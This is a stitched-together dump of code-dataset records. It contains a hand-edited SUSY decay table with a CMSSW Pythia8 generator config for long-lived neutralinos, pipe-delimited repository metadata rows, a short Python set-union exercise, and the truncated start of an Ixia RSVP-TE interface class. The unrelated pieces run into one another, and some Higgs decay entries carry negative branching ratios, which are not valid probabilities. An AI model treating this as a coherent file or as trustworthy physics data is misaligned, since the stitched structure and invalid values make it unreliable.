DECAY 1000002 4.39789139E+00 # sup_L decays
# BR NDA ID1 ID2
2.50000000E-01 2 1000022 2 # BR(~u_L -> ~chi_10 u)
2.50000000E-01 2 1000023 2 # BR(~u_L -> ~chi_20 u)
2.50000000E-01 2 1000025 2 # BR(~u_L -> ~chi_30 u)
2.50000000E-01 2 1000035 2 # BR(~u_L -> ~chi_40 u)
#
# PDG Width
DECAY 2000002 2.35699810E+00 # sup_R decays
# BR NDA ID1 ID2
2.50000000E-01 2 1000022 2 # BR(~u_R -> ~chi_10 u)
2.50000000E-01 2 1000023 2 # BR(~u_R -> ~chi_20 u)
2.50000000E-01 2 1000025 2 # BR(~u_R -> ~chi_30 u)
2.50000000E-01 2 1000035 2 # BR(~u_R -> ~chi_40 u)
#
# PDG Width
DECAY 1000001 4.39789139E+00 # sdown_L decays
# BR NDA ID1 ID2
2.50000000E-01 2 1000022 1 # BR(~d_L -> ~chi_10 d)
2.50000000E-01 2 1000023 1 # BR(~d_L -> ~chi_20 d)
2.50000000E-01 2 1000025 1 # BR(~d_L -> ~chi_30 d)
2.50000000E-01 2 1000035 1 # BR(~d_L -> ~chi_40 d)
#
# PDG Width
DECAY 2000001 5.89249524E-01 # sdown_R decays
# BR NDA ID1 ID2
2.50000000E-01 2 1000022 1 # BR(~d_R -> ~chi_10 d)
2.50000000E-01 2 1000023 1 # BR(~d_R -> ~chi_20 d)
2.50000000E-01 2 1000025 1 # BR(~d_R -> ~chi_30 d)
2.50000000E-01 2 1000035 1 # BR(~d_R -> ~chi_40 d)
#
# PDG Width
DECAY 1000004 4.39789139E+00 # scharm_L decays
# BR NDA ID1 ID2
2.50000000E-01 2 1000022 4 # BR(~c_L -> ~chi_10 c)
2.50000000E-01 2 1000023 4 # BR(~c_L -> ~chi_20 c)
2.50000000E-01 2 1000025 4 # BR(~c_L -> ~chi_30 c)
2.50000000E-01 2 1000035 4 # BR(~c_L -> ~chi_40 c)
#
# PDG Width
DECAY 2000004 2.35699810E+00 # scharm_R decays
# BR NDA ID1 ID2
2.50000000E-01 2 1000022 4 # BR(~c_R -> ~chi_10 c)
2.50000000E-01 2 1000023 4 # BR(~c_R -> ~chi_20 c)
2.50000000E-01 2 1000025 4 # BR(~c_R -> ~chi_30 c)
2.50000000E-01 2 1000035 4 # BR(~c_R -> ~chi_40 c)
#
# PDG Width
DECAY 1000003 4.39789139E+00 # sstrange_L decays
# BR NDA ID1 ID2
2.50000000E-01 2 1000022 3 # BR(~s_L -> ~chi_10 s)
2.50000000E-01 2 1000023 3 # BR(~s_L -> ~chi_20 s)
2.50000000E-01 2 1000025 3 # BR(~s_L -> ~chi_30 s)
2.50000000E-01 2 1000035 3 # BR(~s_L -> ~chi_40 s)
#
# PDG Width
DECAY 2000003 5.89249524E-01 # sstrange_R decays
# BR NDA ID1 ID2
2.50000000E-01 2 1000022 3 # BR(~s_R -> ~chi_10 s)
2.50000000E-01 2 1000023 3 # BR(~s_R -> ~chi_20 s)
2.50000000E-01 2 1000025 3 # BR(~s_R -> ~chi_30 s)
2.50000000E-01 2 1000035 3 # BR(~s_R -> ~chi_40 s)
#
# PDG Width
DECAY 1000011 1.14957407E+03 # selectron_L decays
# BR NDA ID1 ID2
1.77035178E-01 2 1000022 11 # BR(~e_L -> ~chi_10 e-)
7.24219211E-01 2 1000023 11 # BR(~e_L -> ~chi_20 e-)
2.31709727E-03 2 1000025 11 # BR(~e_L -> ~chi_30 e-)
4.85963722E-02 2 1000035 11 # BR(~e_L -> ~chi_40 e-)
4.78321411E-02 2 -1000024 12 # BR(~e_L -> ~chi_1- nu_e)
#
# PDG Width
DECAY 2000011 7.40491593E+02 # selectron_R decays
# BR NDA ID1 ID2
9.70905097E-01 2 1000022 11 # BR(~e_R -> ~chi_10 e-)
1.12621565E-02 2 1000023 11 # BR(~e_R -> ~chi_20 e-)
3.75567007E-03 2 1000025 11 # BR(~e_R -> ~chi_30 e-)
1.40770760E-02 2 1000035 11 # BR(~e_R -> ~chi_40 e-)
#
# PDG Width
DECAY 1000013 1.14957407E+03 # smuon_L decays
# BR NDA ID1 ID2
1.77035178E-01 2 1000022 13 # BR(~mu_L -> ~chi_10 mu-)
7.24219211E-01 2 1000023 13 # BR(~mu_L -> ~chi_20 mu-)
2.31709727E-03 2 1000025 13 # BR(~mu_L -> ~chi_30 mu-)
4.85963722E-02 2 1000035 13 # BR(~mu_L -> ~chi_40 mu-)
4.78321411E-02 2 -1000024 14 # BR(~mu_L -> ~chi_1- nu_mu)
#
# PDG Width
DECAY 2000013 7.40491593E+02 # smuon_R decays
# BR NDA ID1 ID2
9.70905097E-01 2 1000022 13 # BR(~mu_R -> ~chi_10 mu-)
1.12621565E-02 2 1000023 13 # BR(~mu_R -> ~chi_20 mu-)
3.75567007E-03 2 1000025 13 # BR(~mu_R -> ~chi_30 mu-)
1.40770760E-02 2 1000035 13 # BR(~mu_R -> ~chi_40 mu-)
#
# PDG Width
DECAY 1000015 7.21371477E+02 # stau_1 decays
# BR NDA ID1 ID2
8.79723524E-01 2 1000022 15 # BR(~tau_1 -> ~chi_10 tau-)
9.78394101E-02 2 1000023 15 # BR(~tau_1 -> ~chi_20 tau-)
1.36341837E-02 2 1000025 15 # BR(~tau_1 -> ~chi_30 tau-)
8.80288245E-03 2 1000035 15 # BR(~tau_1 -> ~chi_40 tau-)
#
# PDG Width
DECAY 2000015 7.64810560E+07 # stau_2 decays
# BR NDA ID1 ID2
3.47470450E-06 2 1000022 15 # BR(~tau_2 -> ~chi_10 tau-)
9.92864945E-06 2 1000023 15 # BR(~tau_2 -> ~chi_20 tau-)
4.16934434E-07 2 1000025 15 # BR(~tau_2 -> ~chi_30 tau-)
1.26535934E-06 2 1000035 15 # BR(~tau_2 -> ~chi_40 tau-)
8.63848274E-07 2 -1000024 16 # BR(~tau_2 -> ~chi_1- nu_tau)
1.21539693E-16 2 1000016 -37 # BR(~tau_2 -> ~nu_tauL H-)
4.76541501E-01 2 1000016 -24 # BR(~tau_2 -> ~nu_tauL W-)
3.62362808E-13 2 1000015 25 # BR(~tau_2 -> ~tau_1 h)
1.17492293E-13 2 1000015 35 # BR(~tau_2 -> ~tau_1 H)
1.71889290E-13 2 1000015 36 # BR(~tau_2 -> ~tau_1 A)
5.23442550E-01 2 1000015 23 # BR(~tau_2 -> ~tau_1 Z)
#
# PDG Width
DECAY 1000012 1.01221547E+03 # snu_eL decays
# BR NDA ID1 ID2
2.79372600E-01 2 1000022 12 # BR(~nu_eL -> ~chi_10 nu_e)
5.88214477E-01 2 1000023 12 # BR(~nu_eL -> ~chi_20 nu_e)
1.18495551E-02 2 1000025 12 # BR(~nu_eL -> ~chi_30 nu_e)
1.16194049E-01 2 1000035 12 # BR(~nu_eL -> ~chi_40 nu_e)
4.36931919E-03 2 1000024 11 # BR(~nu_eL -> ~chi_1+ e-)
#
# PDG Width
DECAY 1000014 1.01221547E+03 # snu_muL decays
# BR NDA ID1 ID2
2.79372600E-01 2 1000022 14 # BR(~nu_muL -> ~chi_10 nu_mu)
5.88214477E-01 2 1000023 14 # BR(~nu_muL -> ~chi_20 nu_mu)
1.18495551E-02 2 1000025 14 # BR(~nu_muL -> ~chi_30 nu_mu)
1.16194049E-01 2 1000035 14 # BR(~nu_muL -> ~chi_40 nu_mu)
4.36931919E-03 2 1000024 13 # BR(~nu_muL -> ~chi_1+ mu-)
#
# PDG Width
DECAY 1000016 3.45589203E+07 # snu_tauL decays
# BR NDA ID1 ID2
8.14339470E-06 2 1000022 16 # BR(~nu_tauL -> ~chi_10 nu_tau)
1.71457854E-05 2 1000023 16 # BR(~nu_tauL -> ~chi_20 nu_tau)
3.45401102E-07 2 1000025 16 # BR(~nu_tauL -> ~chi_30 nu_tau)
3.38692486E-06 2 1000035 16 # BR(~nu_tauL -> ~chi_40 nu_tau)
8.91121489E-08 2 1000024 15 # BR(~nu_tauL -> ~chi_1+ tau-)
7.73336712E-13 2 -1000015 -37 # BR(~nu_tauL -> ~tau_1+ H-)
9.99970889E-01 2 -1000015 -24 # BR(~nu_tauL -> ~tau_1+ W-)
#
# PDG Width
DECAY 1000024 7.01833737E+09 # chargino1+ decays
# BR NDA ID1 ID2
2.90894156E-07 2 1000002 -1 # BR(~chi_1+ -> ~u_L db)
2.56597205E-07 2 -1000001 2 # BR(~chi_1+ -> ~d_L* u )
2.90894156E-07 2 1000004 -3 # BR(~chi_1+ -> ~c_L sb)
2.56597205E-07 2 -1000003 4 # BR(~chi_1+ -> ~s_L* c )
1.08970890E-07 2 -1000005 6 # BR(~chi_1+ -> ~b_1* t )
2.66850233E-09 2 -2000005 6 # BR(~chi_1+ -> ~b_2* t )
2.21204331E-09 2 -1000015 16 # BR(~chi_1+ -> ~tau_1+ nu_tau)
7.01106740E-03 2 1000022 24 # BR(~chi_1+ -> ~chi_10 W+)
9.34913437E-01 2 1000023 24 # BR(~chi_1+ -> ~chi_20 W+)
3.08104751E-02 2 1000025 24 # BR(~chi_1+ -> ~chi_30 W+)
2.72637115E-02 2 1000035 24 # BR(~chi_1+ -> ~chi_40 W+)
8.35493242E-09 2 1000022 37 # BR(~chi_1+ -> ~chi_10 H+)
1.26441931E-10 2 1000023 37 # BR(~chi_1+ -> ~chi_20 H+)
4.50124336E-08 2 1000025 37 # BR(~chi_1+ -> ~chi_30 H+)
4.67335464E-08 2 1000035 37 # BR(~chi_1+ -> ~chi_40 H+)
#
# PDG Width
DECAY 1000037 3.93890988E+10 # chargino2+ decays
# BR NDA ID1 ID2
6.74883626E-09 2 1000002 -1 # BR(~chi_2+ -> ~u_L db)
1.96057175E-08 2 -1000001 2 # BR(~chi_2+ -> ~d_L* u )
6.74883626E-09 2 1000004 -3 # BR(~chi_2+ -> ~c_L sb)
1.96057175E-08 2 -1000003 4 # BR(~chi_2+ -> ~s_L* c )
1.15937825E-07 2 1000006 -5 # BR(~chi_2+ -> ~t_1 bb)
1.19037282E-07 2 2000006 -5 # BR(~chi_2+ -> ~t_2 bb)
1.11588460E-07 2 -1000005 6 # BR(~chi_2+ -> ~b_1* t )
1.44625833E-08 2 -2000005 6 # BR(~chi_2+ -> ~b_2* t )
1.34536540E-09 2 1000012 -11 # BR(~chi_2+ -> ~nu_eL e+ )
1.34536540E-09 2 1000014 -13 # BR(~chi_2+ -> ~nu_muL mu+ )
1.82588282E-09 2 1000016 -15 # BR(~chi_2+ -> ~nu_tau1 tau+)
3.47934204E-09 2 -1000011 12 # BR(~chi_2+ -> ~e_L+ nu_e)
3.47934204E-09 2 -1000013 14 # BR(~chi_2+ -> ~mu_L+ nu_mu)
1.18484354E-11 2 -1000015 16 # BR(~chi_2+ -> ~tau_1+ nu_tau)
3.76671403E-09 2 -2000015 16 # BR(~chi_2+ -> ~tau_2+ nu_tau)
2.03789007E-02 2 1000024 23 # BR(~chi_2+ -> ~chi_1+ Z )
5.36373400E-03 2 1000022 24 # BR(~chi_2+ -> ~chi_10 W+)
4.86793289E-02 2 1000023 24 # BR(~chi_2+ -> ~chi_20 W+)
3.97860738E-01 2 1000025 24 # BR(~chi_2+ -> ~chi_30 W+)
5.27716802E-01 2 1000035 24 # BR(~chi_2+ -> ~chi_40 W+)
1.42885308E-08 2 1000024 25 # BR(~chi_2+ -> ~chi_1+ h )
1.05312175E-08 2 1000024 35 # BR(~chi_2+ -> ~chi_1+ H )
1.45322715E-08 2 1000024 36 # BR(~chi_2+ -> ~chi_1+ A )
2.63246430E-09 2 1000022 37 # BR(~chi_2+ -> ~chi_10 H+)
2.29697208E-08 2 1000023 37 # BR(~chi_2+ -> ~chi_20 H+)
2.47791857E-09 2 1000025 37 # BR(~chi_2+ -> ~chi_30 H+)
3.81515982E-10 2 1000035 37 # BR(~chi_2+ -> ~chi_40 H+)
#
# These are edited by hand, allowing for R parity violating decays.
# With lambda_122 and lambda_121 equal and non-zero, all the decay modes below would be allowed.
# Each leptonic decay would have a 12.5% BR, but we choose to give equal BRs to the 2*mu, 2*e and e+mu
# final states. In addition, we then halve the total leptonic decay branching ratio, and force
# the remaining half of the decays into the hadronic u d d (and charge-conjugate) mode listed below.
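# (Consistency check of the numbers below: the two e+ e- and the two mu+ mu- modes carry
#  8.35% each and the four e-mu modes carry 4.15% each, so each of the 2e, 2mu and e+mu
#  categories gets roughly 16.6-16.7%, i.e. one third of the halved 50% leptonic total;
#  the remaining 50% goes to the u d d and ubar dbar dbar modes at 25% each.)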
#
# PDG Width
DECAY 1000022 1.97812500e-13 # neutralino1 decays
4.15000000E-02 3 -12 -13 11 # BR(~chi_10 --> nu_ebar mu+ e-)
4.15000000E-02 3 12 13 -11 # BR(~chi_10 --> nu_e mu- e+)
8.35000000E-02 3 -12 -13 13 # BR(~chi_10 --> nu_ebar mu+ mu-)
8.35000000E-02 3 12 13 -13 # BR(~chi_10 --> nu_e mu- mu+)
8.35000000E-02 3 -14 -11 11 # BR(~chi_10 --> nu_mubar e+ e-)
8.35000000E-02 3 14 11 -11 # BR(~chi_10 --> nu_mu e- e+)
4.15000000E-02 3 -14 -11 13 # BR(~chi_10 --> nu_mubar e+ mu-)
4.15000000E-02 3 14 11 -13 # BR(~chi_10 --> nu_mu e- mu+)
2.50000000E-01 3 2 1 1 # BR(~chi_10 --> u d d)
2.50000000E-01 3 -2 -1 -1 # BR(~chi_10 --> ubar dbar dbar)
#
# PDG Width
DECAY 1000023 1.97812500e-14 # neutralino2 decays
# BR NDA ID1 ID2
4.15000000E-02 3 -12 -13 11 # BR(~chi_20 --> nu_ebar mu+ e-)
4.15000000E-02 3 12 13 -11 # BR(~chi_20 --> nu_e mu- e+)
8.35000000E-02 3 -12 -13 13 # BR(~chi_20 --> nu_ebar mu+ mu-)
8.35000000E-02 3 12 13 -13 # BR(~chi_20 --> nu_e mu- mu+)
8.35000000E-02 3 -14 -11 11 # BR(~chi_20 --> nu_mubar e+ e-)
8.35000000E-02 3 14 11 -11 # BR(~chi_20 --> nu_mu e- e+)
4.15000000E-02 3 -14 -11 13 # BR(~chi_20 --> nu_mubar e+ mu-)
4.15000000E-02 3 14 11 -13 # BR(~chi_20 --> nu_mu e- mu+)
2.50000000E-01 3 2 1 1 # BR(~chi_20 --> u d d)
2.50000000E-01 3 -2 -1 -1 # BR(~chi_20 --> ubar dbar dbar)
#
# PDG Width
DECAY 1000025 1.97812500e-15 # neutralino3 decays
# BR NDA ID1 ID2
4.15000000E-02 3 -12 -13 11 # BR(~chi_30 --> nu_ebar mu+ e-)
4.15000000E-02 3 12 13 -11 # BR(~chi_30 --> nu_e mu- e+)
8.35000000E-02 3 -12 -13 13 # BR(~chi_30 --> nu_ebar mu+ mu-)
8.35000000E-02 3 12 13 -13 # BR(~chi_30 --> nu_e mu- mu+)
8.35000000E-02 3 -14 -11 11 # BR(~chi_30 --> nu_mubar e+ e-)
8.35000000E-02 3 14 11 -11 # BR(~chi_30 --> nu_mu e- e+)
4.15000000E-02 3 -14 -11 13 # BR(~chi_30 --> nu_mubar e+ mu-)
4.15000000E-02 3 14 11 -13 # BR(~chi_30 --> nu_mu e- mu+)
2.50000000E-01 3 2 1 1 # BR(~chi_30 --> u d d)
2.50000000E-01 3 -2 -1 -1 # BR(~chi_30 --> ubar dbar dbar)
#
# PDG Width
DECAY 1000035 1.97812500e-16 # neutralino4 decays
# BR NDA ID1 ID2
4.15000000E-02 3 -12 -13 11 # BR(~chi_40 --> nu_ebar mu+ e-)
4.15000000E-02 3 12 13 -11 # BR(~chi_40 --> nu_e mu- e+)
8.35000000E-02 3 -12 -13 13 # BR(~chi_40 --> nu_ebar mu+ mu-)
8.35000000E-02 3 12 13 -13 # BR(~chi_40 --> nu_e mu- mu+)
8.35000000E-02 3 -14 -11 11 # BR(~chi_40 --> nu_mubar e+ e-)
8.35000000E-02 3 14 11 -11 # BR(~chi_40 --> nu_mu e- e+)
4.15000000E-02 3 -14 -11 13 # BR(~chi_40 --> nu_mubar e+ mu-)
4.15000000E-02 3 14 11 -13 # BR(~chi_40 --> nu_mu e- mu+)
2.50000000E-01 3 2 1 1 # BR(~chi_40 --> u d d)
2.50000000E-01 3 -2 -1 -1 # BR(~chi_40 --> ubar dbar dbar)
#
# PDG Width
DECAY 25 4.37072897E-02 # h decays
# BR NDA ID1 ID2
-8.48956100E-04 2 5 -5 # BR(h -> b bb )
6.49196146E-03 2 -15 15 # BR(h -> tau+ tau- )
2.29847114E-05 2 -13 13 # BR(h -> mu+ mu- )
4.98236650E-05 2 3 -3 # BR(h -> s sb )
1.74013922E-03 2 4 -4 # BR(h -> c cb )
4.24426486E-03 2 21 21 # BR(h -> g g )
1.30150434E-04 2 22 22 # BR(h -> gam gam )
2.51876211E-05 2 22 23 # BR(h -> Z gam )
2.91783758E-03 2 24 -24 # BR(h -> W+ W- )
2.72932971E-04 2 23 23 # BR(h -> Z Z )
1.09439297E-01 2 1000023 1000023 # BR(h -> ~chi_20 ~chi_20)
1.09439297E-01 2 1000025 1000025 # BR(h -> ~chi_30 ~chi_30)
1.09439297E-01 2 1000035 1000035 # BR(h -> ~chi_40 ~chi_40)
2.18878594E-01 2 1000023 1000025 # BR(h -> ~chi_20 ~chi_30)
2.18878594E-01 2 1000023 1000035 # BR(h -> ~chi_20 ~chi_40)
2.18878594E-01 2 1000025 1000035 # BR(h -> ~chi_30 ~chi_40)
#
# PDG Width
DECAY 35 2.84187547E-01 # H decays
# BR NDA ID1 ID2
-2.33594670E-03 2 5 -5 # BR(H -> b bb )
2.73102816E-01 2 -15 15 # BR(H -> tau+ tau- )
9.65523813E-04 2 -13 13 # BR(H -> mu+ mu- )
1.60807869E-03 2 3 -3 # BR(H -> s sb )
9.94771297E-06 2 4 -4 # BR(H -> c cb )
1.77882571E-01 2 6 -6 # BR(H -> t tb )
2.68203727E-03 2 21 21 # BR(H -> g g )
3.98544353E-06 2 22 22 # BR(H -> gam gam )
1.37343122E-06 2 23 22 # BR(H -> Z gam )
7.97367629E-03 2 24 -24 # BR(H -> W+ W- )
3.71979823E-03 2 23 23 # BR(H -> Z Z )
3.65976272E-02 2 25 25 # BR(H -> h h )
2.38721161E-20 2 36 36 # BR(H -> A A )
4.40168535E-14 2 23 36 # BR(H -> Z A )
1.63370566E-01 2 1000022 1000022 # BR(H -> ~chi_10 ~chi_10)
2.61257666E-02 2 1000023 1000023 # BR(H -> ~chi_20 ~chi_20)
2.61257666E-02 2 1000025 1000025 # BR(H -> ~chi_30 ~chi_30)
2.61257666E-02 2 1000035 1000035 # BR(H -> ~chi_40 ~chi_40)
3.30953487E-02 2 1000022 1000023 # BR(H -> ~chi_10 ~chi_20)
3.30953487E-02 2 1000022 1000025 # BR(H -> ~chi_10 ~chi_30)
3.30953487E-02 2 1000022 1000035 # BR(H -> ~chi_10 ~chi_40)
5.22515333E-02 2 1000023 1000025 # BR(H -> ~chi_20 ~chi_30)
5.22515333E-02 2 1000023 1000035 # BR(H -> ~chi_20 ~chi_40)
5.22515333E-02 2 1000025 1000035 # BR(H -> ~chi_30 ~chi_40)
#
# PDG Width
DECAY 36 4.28802674E-01 # A decays
# BR NDA ID1 ID2
-1.55405765E-03 2 5 -5 # BR(A -> b bb )
1.81296101E-01 2 -15 15 # BR(A -> tau+ tau- )
6.40899983E-04 2 -13 13 # BR(A -> mu+ mu- )
1.06839001E-03 2 3 -3 # BR(A -> s sb )
5.32911397E-06 2 4 -4 # BR(A -> c cb )
3.51193321E-01 2 6 -6 # BR(A -> t tb )
1.70530600E-03 2 21 21 # BR(A -> g g )
5.57854613E-06 2 22 22 # BR(A -> gam gam )
1.09623588E-06 2 23 22 # BR(A -> Z gam )
4.28392098E-03 2 23 25 # BR(A -> Z h )
3.93439429E-01 2 1000022 1000022 # BR(A -> ~chi_10 ~chi_10)
7.30805342E-03 2 1000023 1000023 # BR(A -> ~chi_20 ~chi_20)
7.30805342E-03 2 1000025 1000025 # BR(A -> ~chi_30 ~chi_30)
7.30805342E-03 2 1000035 1000035 # BR(A -> ~chi_40 ~chi_40)
7.14068293E-04 2 1000022 1000023 # BR(A -> ~chi_10 ~chi_20)
7.14068293E-04 2 1000022 1000025 # BR(A -> ~chi_10 ~chi_30)
7.14068293E-04 2 1000022 1000035 # BR(A -> ~chi_10 ~chi_40)
1.46161068E-02 2 1000023 1000025 # BR(A -> ~chi_20 ~chi_30)
1.46161068E-02 2 1000023 1000035 # BR(A -> ~chi_20 ~chi_40)
1.46161068E-02 2 1000025 1000035 # BR(A -> ~chi_30 ~chi_40)
#
# PDG Width
DECAY 37 7.39768709E-01 # H+ decays
# BR NDA ID1 ID2
1.29309542E-03 2 4 -5 # BR(H+ -> c bb )
1.07332262E-01 2 -15 16 # BR(H+ -> tau+ nu_tau )
3.79429727E-04 2 -13 14 # BR(H+ -> mu+ nu_mu )
8.27534994E-06 2 2 -5 # BR(H+ -> u bb )
2.99043681E-05 2 2 -3 # BR(H+ -> u sb )
6.18051235E-04 2 4 -3 # BR(H+ -> c sb )
8.87507918E-01 2 6 -5 # BR(H+ -> t bb )
2.83098990E-03 2 24 25 # BR(H+ -> W+ h )
7.37617799E-08 2 24 36 # BR(H+ -> W+ A )
"""
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
pythiaPylistVerbosity = cms.untracked.int32(0),
filterEfficiency = cms.untracked.double(0.1875),
pythiaHepMCVerbosity = cms.untracked.bool(False),
comEnergy = cms.double(COM_ENERGY),
crossSection = cms.untracked.double(CROSS_SECTION),
maxEventsToPrint = cms.untracked.int32(1000),
SLHATableForPythia8 = cms.string('%s' % SLHA_TABLE),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
processParameters = cms.vstring(
'SUSY:all = off',
# Indirect neutralino production from squark decay.
'SUSY:gg2squarkantisquark = on',
'SUSY:qqbar2squarkantisquark= on',
'SUSY:qq2squarksquark = on',
# Direct neutralino pair production via weak process.
# 'SUSY:qqbar2chi0chi0 = on',
# 'RHadrons:allow = on',
# 'RHadrons:allowDecay = on',
# 'RHadrons:setMasses = on',
# Pythia calculates the lifetime from the width in the SLHA file, so this shouldn't matter.
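            # (For reference: ctau follows from the width as ctau = hbar*c / Gamma
            #  ~= 1.97327e-16 GeV*m / Gamma, so the neutralino widths of 1.978125E-13
            #  down to 1.978125E-16 GeV in the decay table above correspond to ctau of
            #  roughly 1 mm, 10 mm, 100 mm and 1000 mm respectively.)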
'1000022:tau0 = %.1f' % CHIZERO1_CTAU,
'1000023:tau0 = %.1f' % CHIZERO2_CTAU,
'1000025:tau0 = %.1f' % CHIZERO3_CTAU,
'1000035:tau0 = %.1f' % CHIZERO4_CTAU,
# Allow particles of any lifetime to decay in Pythia. (Unnecessary in Pythia8)
# 'ParticleDecays:limitTau0 = off'
),
parameterSets = cms.vstring(
'pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters'
)
)
)
#== Veto events containing two neutralinos of different species.
pairFilterChi1 = cms.EDFilter("MCParticlePairFilter",
ParticleID1 = cms.untracked.vint32(1000022),
ParticleID2 = cms.untracked.vint32(1000023,1000025,1000035)
)
pairFilterChi2 = cms.EDFilter("MCParticlePairFilter",
ParticleID1 = cms.untracked.vint32(1000023),
ParticleID2 = cms.untracked.vint32(1000022,1000025,1000035)
)
pairFilterChi3 = cms.EDFilter("MCParticlePairFilter",
ParticleID1 = cms.untracked.vint32(1000025),
ParticleID2 = cms.untracked.vint32(1000022,1000023,1000035)
)
pairFilterChi4 = cms.EDFilter("MCParticlePairFilter",
ParticleID1 = cms.untracked.vint32(1000035),
ParticleID2 = cms.untracked.vint32(1000022,1000023,1000025)
)
# Take the logical AND of the NOT of each of the above filters, thereby selecting only events that
# contain a pair of identical neutralinos.
pairFilterSequence = cms.Sequence(~pairFilterChi1 * ~pairFilterChi2 * ~pairFilterChi3 * ~pairFilterChi4)
# N.B. If your PYUPDA table introduces new exotic particles, you will need
# to include the following:
#
from PhysicsTools.HepMCCandAlgos.genParticles_cfi import *
genParticlesForFilter = genParticles.clone()
genParticlesForFilter.abortOnUnknownPDGCode = cms.untracked.bool(False)
#== Require event to contain at least one neutralino that decays leptonically.
from GeneratorInterface.GenFilters.XtoFFbarFilter_cfi import *
chiZeroToLLbarFilter = XtoFFbarFilter.clone(
src = cms.InputTag("genParticlesForFilter"),
# Specify PDG codes of exotics to be accepted by filter.
idMotherX = cms.vint32(1000022,1000023,1000025,1000035),
idMotherY = cms.vint32(),
# Allowed PDG ID of daughter of X (don't specify anti-particle code)
idDaughterF = cms.vint32(11,13),
# Allowed PDG ID of daughter of Y (don't specify anti-particle code)
idDaughterG = cms.vint32()
# If this is set true, then parameter idMotherY is ignored, and instead set equal to idMotherX.
# Furthermore, events are vetoed if they contain more than one species from the list idMotherX.
# idYequalsX = cms.bool(False)
)
ProductionFilterSequence = cms.Sequence(generator*pairFilterSequence*genParticlesForFilter*chiZeroToLLbarFilter)
| [
"[email protected]"
] | |
d387d6b7108eb53681abf09eee7e082564d3f4cd | 90a3c3ecfab0425f520115e049dc6e8476b72b7c | /toph/Set Union.py | 6fdfa05cf4cd80906d7f77ed398ea2bb349d9a95 | [] | no_license | Manash-git/Competitive-Programming | f3e5f7a9bc202ec0a4667fe7f033f0013c8dfd83 | bf79517699285c135bc126c5fabfd724e586460f | refs/heads/master | 2022-12-05T19:37:11.814718 | 2020-08-24T19:16:30 | 2020-08-24T19:16:30 | 108,683,246 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 542 | py | # n = {1,2,5}
# print(type(n))
# l= [1,5,6]
# print(type(set(l)))
# print(n | set(l))
# res = n | set(l)
# for i in res:
# print(i,end=" ")
n,m = input().split()
x = [int(i) for i in str(input()).split()]
y = [int(i) for i in str(input()).split()]
x= set(x)
y= set(y)
# print( set(x)| set(y))
res = sorted(list(x.union(y)))
print(res)
for i in res:
print(i,end=" ")
# for i in range(len(res)-1):
# print(res[i], end=" ")
# for i in range(len(res)):
# if i==len(res)-1:
# print(res[i])
# else:
# print(res[i],end=" ") | [
"[email protected]"
] | |
52bfaf495d77c7025a801ef5061d4964459beaf2 | 1c6283303ceb883add8de4ee07c5ffcfc2e93fab | /Jinja2/lib/python3.7/site-packages/uhd_restpy/testplatform/sessions/ixnetwork/topology/rsvpteif_e2b2ecdbf1fa5e15d2f6d87dd1789f1c.py | cff9728ec94869fd282e2d1c193da41ec355c901 | [] | no_license | pdobrinskiy/devcore | 0f5b3dfc2f3bf1e44abd716f008a01c443e14f18 | 580c7df6f5db8c118990cf01bc2b986285b9718b | refs/heads/main | 2023-07-29T20:28:49.035475 | 2021-09-14T10:02:16 | 2021-09-14T10:02:16 | 405,919,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 58,370 | py | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
from typing import List, Any, Union
class RsvpteIf(Base):
"""Rsvp Neighbor (Device) level Configuration
The RsvpteIf class encapsulates a list of rsvpteIf resources that are managed by the user.
A list of resources can be retrieved from the server using the RsvpteIf.find() method.
The list can be managed by using the RsvpteIf.add() and RsvpteIf.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'rsvpteIf'
_SDM_ATT_MAP = {
'Active': 'active',
'ActualRestartTime': 'actualRestartTime',
'AdvertisedRestartTime': 'advertisedRestartTime',
'AuthenticationAlgorithm': 'authenticationAlgorithm',
'AuthenticationKeyForReceivedPackets': 'authenticationKeyForReceivedPackets',
'AuthenticationKeyForSentPackets': 'authenticationKeyForSentPackets',
'AuthenticationKeyIdentifier': 'authenticationKeyIdentifier',
'AutoGenerateAuthenticationKeyIdentifier': 'autoGenerateAuthenticationKeyIdentifier',
'BundleMessageThresholdTime': 'bundleMessageThresholdTime',
'CheckIntegrityForReceivedPackets': 'checkIntegrityForReceivedPackets',
'ConnectedVia': 'connectedVia',
'Count': 'count',
'DescriptiveName': 'descriptiveName',
'DutIp': 'dutIp',
'EnableBfdRegistration': 'enableBfdRegistration',
'EnableBundleMessageSending': 'enableBundleMessageSending',
'EnableBundleMessageThresholdTimer': 'enableBundleMessageThresholdTimer',
'EnableGracefulRestartHelperMode': 'enableGracefulRestartHelperMode',
'EnableGracefulRestartRestartingMode': 'enableGracefulRestartRestartingMode',
'EnableHelloExtension': 'enableHelloExtension',
'EnableRefreshReduction': 'enableRefreshReduction',
'Errors': 'errors',
'GenerateSequenceNumberBasedOnRealTime': 'generateSequenceNumberBasedOnRealTime',
'HandshakeRequired': 'handshakeRequired',
'HelloInterval': 'helloInterval',
'HelloTimeoutMultiplier': 'helloTimeoutMultiplier',
'InitialSequenceNumber': 'initialSequenceNumber',
